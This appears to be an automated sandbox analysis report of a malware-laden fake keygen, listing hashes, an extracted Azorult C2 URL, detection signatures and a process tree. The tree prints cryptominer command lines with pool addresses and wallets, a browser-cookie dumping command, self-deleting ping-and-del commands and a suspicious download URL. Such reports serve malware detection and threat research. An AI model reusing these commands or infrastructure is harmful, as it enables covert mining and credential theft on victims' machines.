Analysis
-
max time kernel
59s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 20:55
Static task
static1
Behavioral task
behavioral1
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
General
-
Target
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
-
Size
5.4MB
-
MD5
b401dc45a17f4b2acf6f9cf7141683c8
-
SHA1
10a6c5c6dec6ea11f9512e20cc655d53efdb3302
-
SHA256
45fde52ed17c4165995ac279c880225f5725a83c0426dc57886fbabde8dae637
-
SHA512
9f2b2049589a06b678ee4672bc6b493be4ac4a783d8b450830a100c439e90ba7bf4e81fff51bc46800a59365f8447cc31f19e1f2d4a22a0b4983ae56fec9f7d8
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral1/memory/5232-239-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral1/memory/5668-205-0x00000001402CA898-mapping.dmp xmrig behavioral1/memory/5668-220-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 5 IoCs
pid Process 2448 keygen-pr.exe 2916 keygen-step-1.exe 1476 keygen-step-3.exe 800 keygen-step-4.exe 2072 key.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 118 ipinfo.io 168 ip-api.com 101 api.ipify.org 116 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 5284 4380 WerFault.exe 125 5604 4380 WerFault.exe 125 4984 4380 WerFault.exe 125 6372 4380 WerFault.exe 125 6644 4380 WerFault.exe 125 -
Kills process with taskkill 1 IoCs
pid Process 4428 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5704 PING.EXE 5272 PING.EXE 500 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 117 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 120 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1108 wrote to memory of 1200 1108 Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe 76 PID 1108 wrote to memory of 1200 1108 Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe 76 PID 1108 wrote to memory of 1200 1108 Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe 76 PID 1200 wrote to memory of 2448 1200 cmd.exe 79 PID 1200 wrote to memory of 2448 1200 cmd.exe 79 PID 1200 wrote to memory of 2448 1200 cmd.exe 79 PID 1200 wrote to memory of 2916 1200 cmd.exe 80 PID 1200 wrote to memory of 2916 1200 cmd.exe 80 PID 1200 wrote to memory of 2916 1200 cmd.exe 80 PID 1200 wrote to memory of 1476 1200 cmd.exe 81 PID 1200 wrote to memory of 1476 1200 cmd.exe 81 PID 1200 wrote to memory of 1476 1200 cmd.exe 81 PID 1200 wrote to memory of 800 1200 cmd.exe 82 PID 1200 wrote to memory of 800 1200 cmd.exe 82 PID 1200 wrote to memory of 800 1200 cmd.exe 82 PID 2448 wrote to memory of 2072 2448 keygen-pr.exe 83 PID 2448 wrote to memory of 2072 2448 keygen-pr.exe 83 PID 2448 wrote to memory of 2072 2448 keygen-pr.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:1476 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:1000
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:500
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:800 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵PID:3924
-
C:\Users\Admin\AppData\Local\Temp\L25DZTQG5Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L25DZTQG5Y\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\L25DZTQG5Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L25DZTQG5Y\multitimer.exe" 1 3.1617396954.606784dae14bb 1016⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\L25DZTQG5Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\L25DZTQG5Y\multitimer.exe" 2 3.1617396954.606784dae14bb7⤵PID:4996
-
C:\Users\Admin\AppData\Local\Temp\0vc4mbu3rk4\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\0vc4mbu3rk4\cpyrix.exe" /VERYSILENT8⤵PID:4560
-
-
C:\Users\Admin\AppData\Local\Temp\vm5atp3zmin\vict.exe"C:\Users\Admin\AppData\Local\Temp\vm5atp3zmin\vict.exe" /VERYSILENT /id=5358⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\is-JN2PJ.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-JN2PJ.tmp\vict.tmp" /SL5="$202B4,870426,780800,C:\Users\Admin\AppData\Local\Temp\vm5atp3zmin\vict.exe" /VERYSILENT /id=5359⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\is-EVEA7.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-EVEA7.tmp\win1host.exe" 53510⤵PID:5972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1nn2fq3sib5\aa4rfplqxwk.exe"C:\Users\Admin\AppData\Local\Temp\1nn2fq3sib5\aa4rfplqxwk.exe" /ustwo INSTALL8⤵PID:4380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 6529⤵
- Program crash
PID:5284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 6929⤵
- Program crash
PID:5604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 6649⤵
- Program crash
PID:4984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 8169⤵
- Program crash
PID:6372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 8769⤵
- Program crash
PID:6644
-
-
-
C:\Users\Admin\AppData\Local\Temp\5pm2purhcqb\vpn.exe"C:\Users\Admin\AppData\Local\Temp\5pm2purhcqb\vpn.exe" /silent /subid=4828⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\is-SDPET.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-SDPET.tmp\vpn.tmp" /SL5="$302B2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5pm2purhcqb\vpn.exe" /silent /subid=4829⤵PID:5348
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:1356
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\matme4gtzyy\hedtpm5vih2.exe"C:\Users\Admin\AppData\Local\Temp\matme4gtzyy\hedtpm5vih2.exe" /quiet SILENT=1 AF=7568⤵PID:5552
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\matme4gtzyy\hedtpm5vih2.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\matme4gtzyy\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617137446 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6660
-
-
-
C:\Users\Admin\AppData\Local\Temp\30nrale3c3b\app.exe"C:\Users\Admin\AppData\Local\Temp\30nrale3c3b\app.exe" /8-238⤵PID:5232
-
-
C:\Users\Admin\AppData\Local\Temp\wwqjjx5cxsi\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\wwqjjx5cxsi\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\2ulqgos32k3\x54a2oe14sl.exe"C:\Users\Admin\AppData\Local\Temp\2ulqgos32k3\x54a2oe14sl.exe"8⤵PID:1548
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2ulqgos32k3\x54a2oe14sl.exe"9⤵PID:4384
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\azrtxpbupjf\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\azrtxpbupjf\Setup3310.exe" /Verysilent /subid=5778⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\swjnd1rru0s\xi5xnzzlras.exe"C:\Users\Admin\AppData\Local\Temp\swjnd1rru0s\xi5xnzzlras.exe" /VERYSILENT8⤵PID:4556
-
-
C:\Users\Admin\AppData\Local\Temp\3benkpk3g3q\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\3benkpk3g3q\KiffApp1.exe"8⤵PID:4568
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\GveMnyUS1.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\GveMnyUS1.exe"9⤵PID:5344
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵PID:7156
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1H4THPS4VP\setups.exe"C:\Users\Admin\AppData\Local\Temp\1H4THPS4VP\setups.exe" ll5⤵PID:580
-
C:\Users\Admin\AppData\Local\Temp\is-1DRTQ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1DRTQ.tmp\setups.tmp" /SL5="$5005A,635399,250368,C:\Users\Admin\AppData\Local\Temp\1H4THPS4VP\setups.exe" ll6⤵PID:2768
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵PID:1168
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4324
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:5048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:3940
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4332
-
C:\Users\Admin\AppData\Roaming\986D.tmp.exe"C:\Users\Admin\AppData\Roaming\986D.tmp.exe"5⤵PID:4000
-
C:\Users\Admin\AppData\Roaming\986D.tmp.exe"C:\Users\Admin\AppData\Roaming\986D.tmp.exe"6⤵PID:4468
-
-
-
C:\Users\Admin\AppData\Roaming\9A14.tmp.exe"C:\Users\Admin\AppData\Roaming\9A14.tmp.exe"5⤵PID:1596
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5668
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5192
-
-
-
C:\Users\Admin\AppData\Roaming\9B1F.tmp.exe"C:\Users\Admin\AppData\Roaming\9B1F.tmp.exe"5⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:4708
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4688
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4384
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4468
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4808
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\is-Q6MV7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q6MV7.tmp\Setup3310.tmp" /SL5="$5023C,138429,56832,C:\Users\Admin\AppData\Local\Temp\azrtxpbupjf\Setup3310.exe" /Verysilent /subid=5771⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\is-V7N0S.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V7N0S.tmp\Setup.exe" /Verysilent2⤵PID:3220
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:4676
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:5132
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\is-H5DGN.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-H5DGN.tmp\LabPicV3.tmp" /SL5="$20356,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\is-ISMPM.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-ISMPM.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:6580
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\is-8AD6H.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-8AD6H.tmp\lylal220.tmp" /SL5="$20358,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\is-GML10.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-GML10.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:6472
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7140
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:6048
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:6956
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵PID:644
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"3⤵PID:1172
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:4532
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:6116
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:5076
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:6728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-FR6L5.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-FR6L5.tmp\IBInstaller_97039.tmp" /SL5="$202EA,12322324,721408,C:\Users\Admin\AppData\Local\Temp\wwqjjx5cxsi\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\is-OGNJ1.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-OGNJ1.tmp\{app}\chrome_proxy.exe"2⤵PID:5896
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970392⤵PID:5852
-
-
C:\Users\Admin\AppData\Local\Temp\is-J3CI2.tmp\xi5xnzzlras.tmp"C:\Users\Admin\AppData\Local\Temp\is-J3CI2.tmp\xi5xnzzlras.tmp" /SL5="$502D8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\swjnd1rru0s\xi5xnzzlras.exe" /VERYSILENT1⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\is-EP5ND.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-EP5ND.tmp\winlthsth.exe"2⤵PID:5984
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5180
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 15C26F7EB60D1FB03BA3E49A20441B5A C2⤵PID:4496
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4516
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4068
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7164